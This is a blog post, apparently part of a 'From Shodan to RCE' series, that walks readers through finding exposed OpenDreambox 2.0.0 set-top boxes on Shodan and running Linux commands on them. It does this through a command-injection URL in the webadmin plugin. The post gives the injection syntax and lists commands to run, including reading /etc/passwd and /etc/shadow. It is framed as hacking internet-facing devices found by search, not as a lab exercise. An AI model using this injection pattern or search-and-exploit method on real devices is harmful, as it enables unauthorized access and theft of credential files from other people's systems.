From Shodan to Remote Code Execution #2 – hacking OpenDreambox 2.0.0

Posted byAlfiePosted inApplication Security, OS SecurityTags:, , , ,

A sequel to the last post of what is now becoming a series of “From Shodan to remote code execution”, we now take a look at how to hack misconfigured Dreambox installations. Dreambox is a company which offers Digital TV set top boxes and other related services.

Shodan search:

Perform a shodan search as below:

shodan search_

Go through the portals in the search results. The indicator of a vulnerable dreambox installation is the presence of webadmin plugin as below:

webadmin-plugin_.png

From the address bar run linux commands using the syntax: http://IP/PORT/webadmin/script?command=|”linux_command” as shown below:

id _

etc passwd_

etc shadow_

whoami_

cat issue_

 

Credits:  Jonatas Fil, the discoverer of the vulnerability.

5 thoughts on “From Shodan to Remote Code Execution #2 – hacking OpenDreambox 2.0.0

  1. Pingback: CVE-2017-14135 – 安百科技
  2. Pingback: From Shodan to RCE 3: Hacking the Belkin N600DB Wireless Router – the-infosec
  3. Pingback: From Shodan to RCE #3: Hacking the Belkin N600DB Wireless Router – the-infosec
  4. Pingback: OpenDreamBox: la vulnerabilidad que afecta al 32% de las empresas del mundo
  5. Pingback: OpenDreamBox: the vulnerability that affects 32% of the world’s companies

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

%d bloggers like this: